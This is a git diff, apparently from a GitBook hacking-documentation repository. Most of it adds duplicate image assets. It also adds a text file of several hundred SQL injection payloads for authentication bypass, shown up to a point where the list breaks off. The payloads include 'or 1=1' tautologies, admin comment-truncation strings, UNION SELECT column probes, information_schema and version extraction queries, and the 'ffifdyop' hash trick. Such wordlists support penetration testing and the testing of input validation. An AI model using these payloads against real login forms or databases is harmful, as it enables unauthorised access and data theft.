diff --git a/.gitbook/assets/68747470733a2f2f7777772e6275796d6561636f666665652e636f6d2f6173736574732f696d672f637573746f6d5f696d616765732f6f72616e67655f696d672e706e67 (6) (4) (1) (1) (1) (10) (1).png b/.gitbook/assets/68747470733a2f2f7777772e6275796d6561636f666665652e636f6d2f6173736574732f696d672f637573746f6d5f696d616765732f6f72616e67655f696d672e706e67 (6) (4) (1) (1) (1) (10) (1).png new file mode 100644 index 000000000..4c4968b48 Binary files /dev/null and b/.gitbook/assets/68747470733a2f2f7777772e6275796d6561636f666665652e636f6d2f6173736574732f696d672f637573746f6d5f696d616765732f6f72616e67655f696d672e706e67 (6) (4) (1) (1) (1) (10) (1).png differ diff --git a/.gitbook/assets/68747470733a2f2f7777772e6275796d6561636f666665652e636f6d2f6173736574732f696d672f637573746f6d5f696d616765732f6f72616e67655f696d672e706e67 (6) (4) (1) (1) (1) (10) (10).png b/.gitbook/assets/68747470733a2f2f7777772e6275796d6561636f666665652e636f6d2f6173736574732f696d672f637573746f6d5f696d616765732f6f72616e67655f696d672e706e67 (6) (4) (1) (1) (1) (10) (10).png new file mode 100644 index 000000000..4c4968b48 Binary files /dev/null and b/.gitbook/assets/68747470733a2f2f7777772e6275796d6561636f666665652e636f6d2f6173736574732f696d672f637573746f6d5f696d616765732f6f72616e67655f696d672e706e67 (6) (4) (1) (1) (1) (10) (10).png differ diff --git a/.gitbook/assets/68747470733a2f2f7777772e6275796d6561636f666665652e636f6d2f6173736574732f696d672f637573746f6d5f696d616765732f6f72616e67655f696d672e706e67 (6) (4) (1) (1) (1) (10) (11).png b/.gitbook/assets/68747470733a2f2f7777772e6275796d6561636f666665652e636f6d2f6173736574732f696d672f637573746f6d5f696d616765732f6f72616e67655f696d672e706e67 (6) (4) (1) (1) (1) (10) (11).png new file mode 100644 index 000000000..4c4968b48 Binary files /dev/null and b/.gitbook/assets/68747470733a2f2f7777772e6275796d6561636f666665652e636f6d2f6173736574732f696d672f637573746f6d5f696d616765732f6f72616e67655f696d672e706e67 (6) (4) (1) (1) (1) (10) (11).png differ diff --git a/.gitbook/assets/68747470733a2f2f7777772e6275796d6561636f666665652e636f6d2f6173736574732f696d672f637573746f6d5f696d616765732f6f72616e67655f696d672e706e67 (6) (4) (1) (1) (1) (10) (12).png b/.gitbook/assets/68747470733a2f2f7777772e6275796d6561636f666665652e636f6d2f6173736574732f696d672f637573746f6d5f696d616765732f6f72616e67655f696d672e706e67 (6) (4) (1) (1) (1) (10) (12).png new file mode 100644 index 000000000..4c4968b48 Binary files /dev/null and b/.gitbook/assets/68747470733a2f2f7777772e6275796d6561636f666665652e636f6d2f6173736574732f696d672f637573746f6d5f696d616765732f6f72616e67655f696d672e706e67 (6) (4) (1) (1) (1) (10) (12).png differ diff --git a/.gitbook/assets/68747470733a2f2f7777772e6275796d6561636f666665652e636f6d2f6173736574732f696d672f637573746f6d5f696d616765732f6f72616e67655f696d672e706e67 (6) (4) (1) (1) (1) (10) (13).png b/.gitbook/assets/68747470733a2f2f7777772e6275796d6561636f666665652e636f6d2f6173736574732f696d672f637573746f6d5f696d616765732f6f72616e67655f696d672e706e67 (6) (4) (1) (1) (1) (10) (13).png new file mode 100644 index 000000000..4c4968b48 Binary files /dev/null and b/.gitbook/assets/68747470733a2f2f7777772e6275796d6561636f666665652e636f6d2f6173736574732f696d672f637573746f6d5f696d616765732f6f72616e67655f696d672e706e67 (6) (4) (1) (1) (1) (10) (13).png differ diff --git a/.gitbook/assets/68747470733a2f2f7777772e6275796d6561636f666665652e636f6d2f6173736574732f696d672f637573746f6d5f696d616765732f6f72616e67655f696d672e706e67 (6) (4) (1) (1) (1) (10) (14).png b/.gitbook/assets/68747470733a2f2f7777772e6275796d6561636f666665652e636f6d2f6173736574732f696d672f637573746f6d5f696d616765732f6f72616e67655f696d672e706e67 (6) (4) (1) (1) (1) (10) (14).png new file mode 100644 index 000000000..4c4968b48 Binary files /dev/null and b/.gitbook/assets/68747470733a2f2f7777772e6275796d6561636f666665652e636f6d2f6173736574732f696d672f637573746f6d5f696d616765732f6f72616e67655f696d672e706e67 (6) (4) (1) (1) (1) (10) (14).png differ diff --git a/.gitbook/assets/68747470733a2f2f7777772e6275796d6561636f666665652e636f6d2f6173736574732f696d672f637573746f6d5f696d616765732f6f72616e67655f696d672e706e67 (6) (4) (1) (1) (1) (10) (2).png b/.gitbook/assets/68747470733a2f2f7777772e6275796d6561636f666665652e636f6d2f6173736574732f696d672f637573746f6d5f696d616765732f6f72616e67655f696d672e706e67 (6) (4) (1) (1) (1) (10) (2).png new file mode 100644 index 000000000..4c4968b48 Binary files /dev/null and b/.gitbook/assets/68747470733a2f2f7777772e6275796d6561636f666665652e636f6d2f6173736574732f696d672f637573746f6d5f696d616765732f6f72616e67655f696d672e706e67 (6) (4) (1) (1) (1) (10) (2).png differ diff --git a/.gitbook/assets/68747470733a2f2f7777772e6275796d6561636f666665652e636f6d2f6173736574732f696d672f637573746f6d5f696d616765732f6f72616e67655f696d672e706e67 (6) (4) (1) (1) (1) (10) (3).png b/.gitbook/assets/68747470733a2f2f7777772e6275796d6561636f666665652e636f6d2f6173736574732f696d672f637573746f6d5f696d616765732f6f72616e67655f696d672e706e67 (6) (4) (1) (1) (1) (10) (3).png new file mode 100644 index 000000000..4c4968b48 Binary files /dev/null and b/.gitbook/assets/68747470733a2f2f7777772e6275796d6561636f666665652e636f6d2f6173736574732f696d672f637573746f6d5f696d616765732f6f72616e67655f696d672e706e67 (6) (4) (1) (1) (1) (10) (3).png differ diff --git a/.gitbook/assets/68747470733a2f2f7777772e6275796d6561636f666665652e636f6d2f6173736574732f696d672f637573746f6d5f696d616765732f6f72616e67655f696d672e706e67 (6) (4) (1) (1) (1) (10) (4).png b/.gitbook/assets/68747470733a2f2f7777772e6275796d6561636f666665652e636f6d2f6173736574732f696d672f637573746f6d5f696d616765732f6f72616e67655f696d672e706e67 (6) (4) (1) (1) (1) (10) (4).png new file mode 100644 index 000000000..4c4968b48 Binary files /dev/null and b/.gitbook/assets/68747470733a2f2f7777772e6275796d6561636f666665652e636f6d2f6173736574732f696d672f637573746f6d5f696d616765732f6f72616e67655f696d672e706e67 (6) (4) (1) (1) (1) (10) (4).png differ diff --git a/.gitbook/assets/68747470733a2f2f7777772e6275796d6561636f666665652e636f6d2f6173736574732f696d672f637573746f6d5f696d616765732f6f72616e67655f696d672e706e67 (6) (4) (1) (1) (1) (10) (5).png b/.gitbook/assets/68747470733a2f2f7777772e6275796d6561636f666665652e636f6d2f6173736574732f696d672f637573746f6d5f696d616765732f6f72616e67655f696d672e706e67 (6) (4) (1) (1) (1) (10) (5).png new file mode 100644 index 000000000..4c4968b48 Binary files /dev/null and b/.gitbook/assets/68747470733a2f2f7777772e6275796d6561636f666665652e636f6d2f6173736574732f696d672f637573746f6d5f696d616765732f6f72616e67655f696d672e706e67 (6) (4) (1) (1) (1) (10) (5).png differ diff --git a/.gitbook/assets/68747470733a2f2f7777772e6275796d6561636f666665652e636f6d2f6173736574732f696d672f637573746f6d5f696d616765732f6f72616e67655f696d672e706e67 (6) (4) (1) (1) (1) (10) (6).png b/.gitbook/assets/68747470733a2f2f7777772e6275796d6561636f666665652e636f6d2f6173736574732f696d672f637573746f6d5f696d616765732f6f72616e67655f696d672e706e67 (6) (4) (1) (1) (1) (10) (6).png new file mode 100644 index 000000000..4c4968b48 Binary files /dev/null and b/.gitbook/assets/68747470733a2f2f7777772e6275796d6561636f666665652e636f6d2f6173736574732f696d672f637573746f6d5f696d616765732f6f72616e67655f696d672e706e67 (6) (4) (1) (1) (1) (10) (6).png differ diff --git a/.gitbook/assets/68747470733a2f2f7777772e6275796d6561636f666665652e636f6d2f6173736574732f696d672f637573746f6d5f696d616765732f6f72616e67655f696d672e706e67 (6) (4) (1) (1) (1) (10) (7).png b/.gitbook/assets/68747470733a2f2f7777772e6275796d6561636f666665652e636f6d2f6173736574732f696d672f637573746f6d5f696d616765732f6f72616e67655f696d672e706e67 (6) (4) (1) (1) (1) (10) (7).png new file mode 100644 index 000000000..4c4968b48 Binary files /dev/null and b/.gitbook/assets/68747470733a2f2f7777772e6275796d6561636f666665652e636f6d2f6173736574732f696d672f637573746f6d5f696d616765732f6f72616e67655f696d672e706e67 (6) (4) (1) (1) (1) (10) (7).png differ diff --git a/.gitbook/assets/68747470733a2f2f7777772e6275796d6561636f666665652e636f6d2f6173736574732f696d672f637573746f6d5f696d616765732f6f72616e67655f696d672e706e67 (6) (4) (1) (1) (1) (10) (8).png b/.gitbook/assets/68747470733a2f2f7777772e6275796d6561636f666665652e636f6d2f6173736574732f696d672f637573746f6d5f696d616765732f6f72616e67655f696d672e706e67 (6) (4) (1) (1) (1) (10) (8).png new file mode 100644 index 000000000..4c4968b48 Binary files /dev/null and b/.gitbook/assets/68747470733a2f2f7777772e6275796d6561636f666665652e636f6d2f6173736574732f696d672f637573746f6d5f696d616765732f6f72616e67655f696d672e706e67 (6) (4) (1) (1) (1) (10) (8).png differ diff --git a/.gitbook/assets/68747470733a2f2f7777772e6275796d6561636f666665652e636f6d2f6173736574732f696d672f637573746f6d5f696d616765732f6f72616e67655f696d672e706e67 (6) (4) (1) (1) (1) (10) (9).png b/.gitbook/assets/68747470733a2f2f7777772e6275796d6561636f666665652e636f6d2f6173736574732f696d672f637573746f6d5f696d616765732f6f72616e67655f696d672e706e67 (6) (4) (1) (1) (1) (10) (9).png new file mode 100644 index 000000000..4c4968b48 Binary files /dev/null and b/.gitbook/assets/68747470733a2f2f7777772e6275796d6561636f666665652e636f6d2f6173736574732f696d672f637573746f6d5f696d616765732f6f72616e67655f696d672e706e67 (6) (4) (1) (1) (1) (10) (9).png differ diff --git a/.gitbook/assets/image (107) (2) (2) (2) (2) (2) (1) (1) (1) (1).png b/.gitbook/assets/image (107) (2) (2) (2) (2) (2) (1) (1) (1) (1).png new file mode 100644 index 000000000..5c4892619 Binary files /dev/null and b/.gitbook/assets/image (107) (2) (2) (2) (2) (2) (1) (1) (1) (1).png differ diff --git a/.gitbook/assets/image (25) (2) (2) (2) (2) (2) (2) (2) (2) (1) (1) (1) (1).png b/.gitbook/assets/image (25) (2) (2) (2) (2) (2) (2) (2) (2) (1) (1) (1) (1).png new file mode 100644 index 000000000..007459da8 Binary files /dev/null and b/.gitbook/assets/image (25) (2) (2) (2) (2) (2) (2) (2) (2) (1) (1) (1) (1).png differ diff --git a/.gitbook/assets/image (253) (1) (2) (1) (1) (2) (2) (3) (3) (5) (3) (1) (1) (2) (1).png b/.gitbook/assets/image (253) (1) (2) (1) (1) (2) (2) (3) (3) (5) (3) (1) (1) (2) (1).png new file mode 100644 index 000000000..b2fe24f43 Binary files /dev/null and b/.gitbook/assets/image (253) (1) (2) (1) (1) (2) (2) (3) (3) (5) (3) (1) (1) (2) (1).png differ diff --git a/.gitbook/assets/image (253) (1) (2) (1) (1) (2) (2) (3) (3) (5) (3) (1) (1) (2) (2).png b/.gitbook/assets/image (253) (1) (2) (1) (1) (2) (2) (3) (3) (5) (3) (1) (1) (2) (2).png new file mode 100644 index 000000000..b2fe24f43 Binary files /dev/null and b/.gitbook/assets/image (253) (1) (2) (1) (1) (2) (2) (3) (3) (5) (3) (1) (1) (2) (2).png differ diff --git a/.gitbook/assets/image (253) (1) (2) (1) (1) (2) (2) (3) (3) (5) (3) (1) (1) (2) (3).png b/.gitbook/assets/image (253) (1) (2) (1) (1) (2) (2) (3) (3) (5) (3) (1) (1) (2) (3).png new file mode 100644 index 000000000..b2fe24f43 Binary files /dev/null and b/.gitbook/assets/image (253) (1) (2) (1) (1) (2) (2) (3) (3) (5) (3) (1) (1) (2) (3).png differ diff --git a/.gitbook/assets/image (253) (1) (2) (1) (1) (2) (2) (3) (3) (5) (3) (1) (1) (2) (4).png b/.gitbook/assets/image (253) (1) (2) (1) (1) (2) (2) (3) (3) (5) (3) (1) (1) (2) (4).png new file mode 100644 index 000000000..b2fe24f43 Binary files /dev/null and b/.gitbook/assets/image (253) (1) (2) (1) (1) (2) (2) (3) (3) (5) (3) (1) (1) (2) (4).png differ diff --git a/.gitbook/assets/image (253) (1) (2) (1) (1) (2) (2) (3) (3) (5) (3) (1) (1) (2) (5).png b/.gitbook/assets/image (253) (1) (2) (1) (1) (2) (2) (3) (3) (5) (3) (1) (1) (2) (5).png new file mode 100644 index 000000000..b2fe24f43 Binary files /dev/null and b/.gitbook/assets/image (253) (1) (2) (1) (1) (2) (2) (3) (3) (5) (3) (1) (1) (2) (5).png differ diff --git a/.gitbook/assets/image (253) (1) (2) (1) (1) (2) (2) (3) (3) (5) (3) (1) (1) (2) (6).png b/.gitbook/assets/image (253) (1) (2) (1) (1) (2) (2) (3) (3) (5) (3) (1) (1) (2) (6).png new file mode 100644 index 000000000..b2fe24f43 Binary files /dev/null and b/.gitbook/assets/image (253) (1) (2) (1) (1) (2) (2) (3) (3) (5) (3) (1) (1) (2) (6).png differ diff --git a/.gitbook/assets/image (253) (1) (2) (1) (1) (2) (2) (3) (3) (5) (3) (1) (1) (2) (7).png b/.gitbook/assets/image (253) (1) (2) (1) (1) (2) (2) (3) (3) (5) (3) (1) (1) (2) (7).png new file mode 100644 index 000000000..b2fe24f43 Binary files /dev/null and b/.gitbook/assets/image (253) (1) (2) (1) (1) (2) (2) (3) (3) (5) (3) (1) (1) (2) (7).png differ diff --git a/.gitbook/assets/image (345) (2) (2) (2) (2) (2) (2) (2) (2) (2) (1) (1) (1) (1).png b/.gitbook/assets/image (345) (2) (2) (2) (2) (2) (2) (2) (2) (2) (1) (1) (1) (1).png new file mode 100644 index 000000000..a8a225c86 Binary files /dev/null and b/.gitbook/assets/image (345) (2) (2) (2) (2) (2) (2) (2) (2) (2) (1) (1) (1) (1).png differ diff --git a/.gitbook/assets/image (413) (3) (3) (3) (2) (1) (2) (1).png b/.gitbook/assets/image (413) (3) (3) (3) (2) (1) (2) (1).png new file mode 100644 index 000000000..fa1f7424c Binary files /dev/null and b/.gitbook/assets/image (413) (3) (3) (3) (2) (1) (2) (1).png differ diff --git a/.gitbook/assets/image (413) (3) (3) (3) (2) (1) (2) (2).png b/.gitbook/assets/image (413) (3) (3) (3) (2) (1) (2) (2).png new file mode 100644 index 000000000..fa1f7424c Binary files /dev/null and b/.gitbook/assets/image (413) (3) (3) (3) (2) (1) (2) (2).png differ diff --git a/.gitbook/assets/image (446) (1) (2) (2) (3) (3) (2) (1) (2) (1).png b/.gitbook/assets/image (446) (1) (2) (2) (3) (3) (2) (1) (2) (1).png new file mode 100644 index 000000000..574ff118e Binary files /dev/null and b/.gitbook/assets/image (446) (1) (2) (2) (3) (3) (2) (1) (2) (1).png differ diff --git a/.gitbook/assets/image (446) (1) (2) (2) (3) (3) (2) (1) (2) (2).png b/.gitbook/assets/image (446) (1) (2) (2) (3) (3) (2) (1) (2) (2).png new file mode 100644 index 000000000..574ff118e Binary files /dev/null and b/.gitbook/assets/image (446) (1) (2) (2) (3) (3) (2) (1) (2) (2).png differ diff --git a/.gitbook/assets/image (466) (2) (2) (2) (2) (2) (2) (2) (3) (1) (1) (2) (1).png b/.gitbook/assets/image (466) (2) (2) (2) (2) (2) (2) (2) (3) (1) (1) (2) (1).png new file mode 100644 index 000000000..687c4435f Binary files /dev/null and b/.gitbook/assets/image (466) (2) (2) (2) (2) (2) (2) (2) (3) (1) (1) (2) (1).png differ diff --git a/.gitbook/assets/image (466) (2) (2) (2) (2) (2) (2) (2) (3) (1) (1) (2) (2).png b/.gitbook/assets/image (466) (2) (2) (2) (2) (2) (2) (2) (3) (1) (1) (2) (2).png new file mode 100644 index 000000000..687c4435f Binary files /dev/null and b/.gitbook/assets/image (466) (2) (2) (2) (2) (2) (2) (2) (3) (1) (1) (2) (2).png differ diff --git a/.gitbook/assets/image (466) (2) (2) (2) (2) (2) (2) (2) (3) (1) (1) (2) (3).png b/.gitbook/assets/image (466) (2) (2) (2) (2) (2) (2) (2) (3) (1) (1) (2) (3).png new file mode 100644 index 000000000..687c4435f Binary files /dev/null and b/.gitbook/assets/image (466) (2) (2) (2) (2) (2) (2) (2) (3) (1) (1) (2) (3).png differ diff --git a/.gitbook/assets/image (466) (2) (2) (2) (2) (2) (2) (2) (3) (1) (1) (2) (4).png b/.gitbook/assets/image (466) (2) (2) (2) (2) (2) (2) (2) (3) (1) (1) (2) (4).png new file mode 100644 index 000000000..687c4435f Binary files /dev/null and b/.gitbook/assets/image (466) (2) (2) (2) (2) (2) (2) (2) (3) (1) (1) (2) (4).png differ diff --git a/.gitbook/assets/image (466) (2) (2) (2) (2) (2) (2) (2) (3) (1) (1) (2) (5).png b/.gitbook/assets/image (466) (2) (2) (2) (2) (2) (2) (2) (3) (1) (1) (2) (5).png new file mode 100644 index 000000000..687c4435f Binary files /dev/null and b/.gitbook/assets/image (466) (2) (2) (2) (2) (2) (2) (2) (3) (1) (1) (2) (5).png differ diff --git a/.gitbook/assets/image (477) (2) (2) (2) (2) (2) (2) (2) (3) (1) (1) (2) (1).png b/.gitbook/assets/image (477) (2) (2) (2) (2) (2) (2) (2) (3) (1) (1) (2) (1).png new file mode 100644 index 000000000..5ec5cf81e Binary files /dev/null and b/.gitbook/assets/image (477) (2) (2) (2) (2) (2) (2) (2) (3) (1) (1) (2) (1).png differ diff --git a/.gitbook/assets/image (477) (2) (2) (2) (2) (2) (2) (2) (3) (1) (1) (2) (2).png b/.gitbook/assets/image (477) (2) (2) (2) (2) (2) (2) (2) (3) (1) (1) (2) (2).png new file mode 100644 index 000000000..5ec5cf81e Binary files /dev/null and b/.gitbook/assets/image (477) (2) (2) (2) (2) (2) (2) (2) (3) (1) (1) (2) (2).png differ diff --git a/.gitbook/assets/image (477) (2) (2) (2) (2) (2) (2) (2) (3) (1) (1) (2) (3).png b/.gitbook/assets/image (477) (2) (2) (2) (2) (2) (2) (2) (3) (1) (1) (2) (3).png new file mode 100644 index 000000000..5ec5cf81e Binary files /dev/null and b/.gitbook/assets/image (477) (2) (2) (2) (2) (2) (2) (2) (3) (1) (1) (2) (3).png differ diff --git a/.gitbook/assets/image (535) (1) (1) (2) (2) (2) (2) (2) (2) (1) (1) (2) (1).png b/.gitbook/assets/image (535) (1) (1) (2) (2) (2) (2) (2) (2) (1) (1) (2) (1).png new file mode 100644 index 000000000..50fcd35cf Binary files /dev/null and b/.gitbook/assets/image (535) (1) (1) (2) (2) (2) (2) (2) (2) (1) (1) (2) (1).png differ diff --git a/.gitbook/assets/image (535) (1) (1) (2) (2) (2) (2) (2) (2) (1) (1) (2) (2).png b/.gitbook/assets/image (535) (1) (1) (2) (2) (2) (2) (2) (2) (1) (1) (2) (2).png new file mode 100644 index 000000000..50fcd35cf Binary files /dev/null and b/.gitbook/assets/image (535) (1) (1) (2) (2) (2) (2) (2) (2) (1) (1) (2) (2).png differ diff --git a/.gitbook/assets/image (535) (1) (1) (2) (2) (2) (2) (2) (2) (1) (1) (2) (3).png b/.gitbook/assets/image (535) (1) (1) (2) (2) (2) (2) (2) (2) (1) (1) (2) (3).png new file mode 100644 index 000000000..50fcd35cf Binary files /dev/null and b/.gitbook/assets/image (535) (1) (1) (2) (2) (2) (2) (2) (2) (1) (1) (2) (3).png differ diff --git a/.gitbook/assets/image (567) (1) (2) (2) (2) (2) (2) (2) (2) (1) (1) (1) (1).png b/.gitbook/assets/image (567) (1) (2) (2) (2) (2) (2) (2) (2) (1) (1) (1) (1).png new file mode 100644 index 000000000..98efc7f5c Binary files /dev/null and b/.gitbook/assets/image (567) (1) (2) (2) (2) (2) (2) (2) (2) (1) (1) (1) (1).png differ diff --git a/.gitbook/assets/image (620) (1) (1).png b/.gitbook/assets/image (620) (1) (1).png new file mode 100644 index 000000000..e2fc218f9 Binary files /dev/null and b/.gitbook/assets/image (620) (1) (1).png differ diff --git a/.gitbook/assets/image (638) (1) (2) (1).png b/.gitbook/assets/image (638) (1) (2) (1).png new file mode 100644 index 000000000..4e69d4e12 Binary files /dev/null and b/.gitbook/assets/image (638) (1) (2) (1).png differ diff --git a/.gitbook/assets/image (638) (1) (2) (2).png b/.gitbook/assets/image (638) (1) (2) (2).png new file mode 100644 index 000000000..4e69d4e12 Binary files /dev/null and b/.gitbook/assets/image (638) (1) (2) (2).png differ diff --git a/.gitbook/assets/sqli-authbypass-big (2).txt b/.gitbook/assets/sqli-authbypass-big (2).txt new file mode 100644 index 000000000..5a03da57f --- /dev/null +++ b/.gitbook/assets/sqli-authbypass-big (2).txt @@ -0,0 +1,771 @@ +'-' +' ' +'&' +'^' +'*' +' or ''-' +' or '' ' +' or ''&' +' or ''^' +' or ''*' +"-" +" " +"&" +"^" +"*" +" or ""-" +" or "" " +" or ""&" +" or ""^" +" or ""*" +or true-- +" or true-- +' or true-- +") or true-- +') or true-- +' or 'x'='x +') or ('x')=('x +')) or (('x'))=(('x +" or "x"="x +") or ("x")=("x +")) or (("x"))=(("x +or 1=1 +or 1=1-- +or 1=1# +or 1=1/* +admin' -- +admin' # +admin'/* +admin' or '1'='1 +admin' or '1'='1'-- +admin' or '1'='1'# +admin' or '1'='1'/* +admin'or 1=1 or ''=' +admin' or 1=1 +admin' or 1=1-- +admin' or 1=1# +admin' or 1=1/* +admin') or ('1'='1 +admin') or ('1'='1'-- +admin') or ('1'='1'# +admin') or ('1'='1'/* +admin') or '1'='1 +admin') or '1'='1'-- +admin') or '1'='1'# +admin') or '1'='1'/* +1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055 +admin" -- +admin" # +admin"/* +admin" or "1"="1 +admin" or "1"="1"-- +admin" or "1"="1"# +admin" or "1"="1"/* +admin"or 1=1 or ""=" +admin" or 1=1 +admin" or 1=1-- +admin" or 1=1# +admin" or 1=1/* +admin") or ("1"="1 +admin") or ("1"="1"-- +admin") or ("1"="1"# +admin") or ("1"="1"/* +admin") or "1"="1 +admin") or "1"="1"-- +admin") or "1"="1"# +admin") or "1"="1"/* +1234 " AND 1=0 UNION ALL SELECT "admin", "81dc9bdb52d04dc20036dbd8313ed055 +== += +' +' -- +' # +' – +'-- +'/* +'# +" -- +" # +"/* +' and 1='1 +' and a='a + or 1=1 + or true +' or ''=' +" or ""=" +1′) and '1′='1– +' AND 1=0 UNION ALL SELECT '', '81dc9bdb52d04dc20036dbd8313ed055 +" AND 1=0 UNION ALL SELECT "", "81dc9bdb52d04dc20036dbd8313ed055 + and 1=1 + and 1=1– +' and 'one'='one +' and 'one'='one– +' group by password having 1=1-- +' group by userid having 1=1-- +' group by username having 1=1-- + like '%' + or 0=0 -- + or 0=0 # + or 0=0 – +' or 0=0 # +' or 0=0 -- +' or 0=0 # +' or 0=0 – +" or 0=0 -- +" or 0=0 # +" or 0=0 – +%' or '0'='0 + or 1=1 + or 1=1-- + or 1=1/* + or 1=1# + or 1=1– +' or 1=1-- +' or '1'='1 +' or '1'='1'-- +' or '1'='1'/* +' or '1'='1'# +' or '1′='1 +' or 1=1 +' or 1=1 -- +' or 1=1 – +' or 1=1-- +' or 1=1;# +' or 1=1/* +' or 1=1# +' or 1=1– +') or '1'='1 +') or '1'='1-- +') or '1'='1'-- +') or '1'='1'/* +') or '1'='1'# +') or ('1'='1 +') or ('1'='1-- +') or ('1'='1'-- +') or ('1'='1'/* +') or ('1'='1'# +'or'1=1 +'or'1=1′ +" or "1"="1 +" or "1"="1"-- +" or "1"="1"/* +" or "1"="1"# +" or 1=1 +" or 1=1 -- +" or 1=1 – +" or 1=1-- +" or 1=1/* +" or 1=1# +" or 1=1– +") or "1"="1 +") or "1"="1"-- +") or "1"="1"/* +") or "1"="1"# +") or ("1"="1 +") or ("1"="1"-- +") or ("1"="1"/* +") or ("1"="1"# +) or '1′='1– +) or ('1′='1– +' or 1=1 LIMIT 1;# +'or 1=1 or ''=' +"or 1=1 or ""=" +' or 'a'='a +' or a=a-- +' or a=a– +') or ('a'='a +" or "a"="a +") or ("a"="a +') or ('a'='a and hi") or ("a"="a +' or 'one'='one +' or 'one'='one– +' or uid like '% +' or uname like '% +' or userid like '% +' or user like '% +' or username like '% +' or 'x'='x +') or ('x'='x +" or "x"="x +' OR 'x'='x'#; +'=' 'or' and '=' 'or' +' UNION ALL SELECT 1, @@version;# +' UNION ALL SELECT system_user(),user();# +' UNION select table_schema,table_name FROM information_Schema.tables;# +admin' and substring(password/text(),1,1)='7 +' and substring(password/text(),1,1)='7 + +== += +' +" +'-- 2 +'/* +'# +"-- 2 +" # +"/* +'-' +'&' +'^' +'*' +'=' +0'<'2 +"-" +"&" +"^" +"*" +"=" +0"<"2 + +') +") +')-- 2 +')/* +')# +")-- 2 +") # +")/* +')-(' +')&(' +')^(' +')*(' +')=(' +0')<('2 +")-(" +")&(" +")^(" +")*(" +")=(" +0")<("2 + +'-''-- 2 +'-''# +'-''/* +'&''-- 2 +'&''# +'&''/* +'^''-- 2 +'^''# +'^''/* +'*''-- 2 +'*''# +'*''/* +'=''-- 2 +'=''# +'=''/* +0'<'2'-- 2 +0'<'2'# +0'<'2'/* +"-""-- 2 +"-""# +"-""/* +"&""-- 2 +"&""# +"&""/* +"^""-- 2 +"^""# +"^""/* +"*""-- 2 +"*""# +"*""/* +"=""-- 2 +"=""# +"=""/* +0"<"2"-- 2 +0"<"2"# +0"<"2"/* + +')-''-- 2 +')-''# +')-''/* +')&''-- 2 +')&''# +')&''/* +')^''-- 2 +')^''# +')^''/* +')*''-- 2 +')*''# +')*''/* +')=''-- 2 +')=''# +')=''/* +0')<'2'-- 2 +0')<'2'# +0')<'2'/* +")-""-- 2 +")-""# +")-""/* +")&""-- 2 +")&""# +")&""/* +")^""-- 2 +")^""# +")^""/* +")*""-- 2 +")*""# +")*""/* +")=""-- 2 +")=""# +")=""/* +0")<"2-- 2 +0")<"2# +0")<"2/* + + +'oR'2 +'oR'2'-- 2 +'oR'2'# +'oR'2'/* +'oR'2'oR' +'oR(2)-- 2 +'oR(2)# +'oR(2)/* +'oR(2)oR' +'oR 2-- 2 +'oR 2# +'oR 2/* +'oR 2 oR' +'oR/**/2-- 2 +'oR/**/2# +'oR/**/2/* +'oR/**/2/**/oR' +"oR"2 +"oR"2"-- 2 +"oR"2"# +"oR"2"/* +"oR"2"oR" +"oR(2)-- 2 +"oR(2)# +"oR(2)/* +"oR(2)oR" +"oR 2-- 2 +"oR 2# +"oR 2/* +"oR 2 oR" +"oR/**/2-- 2 +"oR/**/2# +"oR/**/2/* +"oR/**/2/**/oR" + +'oR'2'='2 +'oR'2'='2'oR' +'oR'2'='2'-- 2 +'oR'2'='2'# +'oR'2'='2'/* +'oR'2'='2'oR' +'oR 2=2-- 2 +'oR 2=2# +'oR 2=2/* +'oR 2=2 oR' +'oR/**/2=2-- 2 +'oR/**/2=2# +'oR/**/2=2/* +'oR/**/2=2/**/oR' +'oR(2)=2-- 2 +'oR(2)=2# +'oR(2)=2/* +'oR(2)=2/* +'oR(2)=(2)oR' +'oR'2'='2' LimIT 1-- 2 +'oR'2'='2' LimIT 1# +'oR'2'='2' LimIT 1/* +'oR(2)=(2)LimIT(1)-- 2 +'oR(2)=(2)LimIT(1)# +'oR(2)=(2)LimIT(1)/* +"oR"2"="2 +"oR"2"="2"oR" +"oR"2"="2"-- 2 +"oR"2"="2"# +"oR"2"="2"/* +"oR"2"="2"oR" +"oR 2=2-- 2 +"oR 2=2# +"oR 2=2/* +"oR 2=2 oR" +"oR/**/2=2-- 2 +"oR/**/2=2# +"oR/**/2=2/* +"oR/**/2=2/**/oR" +"oR(2)=2-- 2 +"oR(2)=2# +"oR(2)=2/* +"oR(2)=2/* +"oR(2)=(2)oR" +"oR"2"="2" LimIT 1-- 2 +"oR"2"="2" LimIT 1# +"oR"2"="2" LimIT 1/* +"oR(2)=(2)LimIT(1)-- 2 +"oR(2)=(2)LimIT(1)# +"oR(2)=(2)LimIT(1)/* + +'oR true-- 2 +'oR true# +'oR true/* +'oR true oR' +'oR(true)-- 2 +'oR(true)# +'oR(true)/* +'oR(true)oR' +'oR/**/true-- 2 +'oR/**/true# +'oR/**/true/* +'oR/**/true/**/oR' +"oR true-- 2 +"oR true# +"oR true/* +"oR true oR" +"oR(true)-- 2 +"oR(true)# +"oR(true)/* +"oR(true)oR" +"oR/**/true-- 2 +"oR/**/true# +"oR/**/true/* +"oR/**/true/**/oR" + +'oR'2'LiKE'2 +'oR'2'LiKE'2'-- 2 +'oR'2'LiKE'2'# +'oR'2'LiKE'2'/* +'oR'2'LiKE'2'oR' +'oR(2)LiKE(2)-- 2 +'oR(2)LiKE(2)# +'oR(2)LiKE(2)/* +'oR(2)LiKE(2)oR' +"oR"2"LiKE"2 +"oR"2"LiKE"2"-- 2 +"oR"2"LiKE"2"# +"oR"2"LiKE"2"/* +"oR"2"LiKE"2"oR" +"oR(2)LiKE(2)-- 2 +"oR(2)LiKE(2)# +"oR(2)LiKE(2)/* +"oR(2)LiKE(2)oR" + +admin +admin'-- 2 +admin'# +admin'/* +admin"-- 2 +admin"# +ffifdyop + +' UniON SElecT 1,2-- 2 +' UniON SElecT 1,2,3-- 2 +' UniON SElecT 1,2,3,4-- 2 +' UniON SElecT 1,2,3,4,5-- 2 +' UniON SElecT 1,2# +' UniON SElecT 1,2,3# +' UniON SElecT 1,2,3,4# +' UniON SElecT 1,2,3,4,5# +'UniON(SElecT(1),2)-- 2 +'UniON(SElecT(1),2,3)-- 2 +'UniON(SElecT(1),2,3,4)-- 2 +'UniON(SElecT(1),2,3,4,5)-- 2 +'UniON(SElecT(1),2)# +'UniON(SElecT(1),2,3)# +'UniON(SElecT(1),2,3,4)# +'UniON(SElecT(1),2,3,4,5)# +" UniON SElecT 1,2-- 2 +" UniON SElecT 1,2,3-- 2 +" UniON SElecT 1,2,3,4-- 2 +" UniON SElecT 1,2,3,4,5-- 2 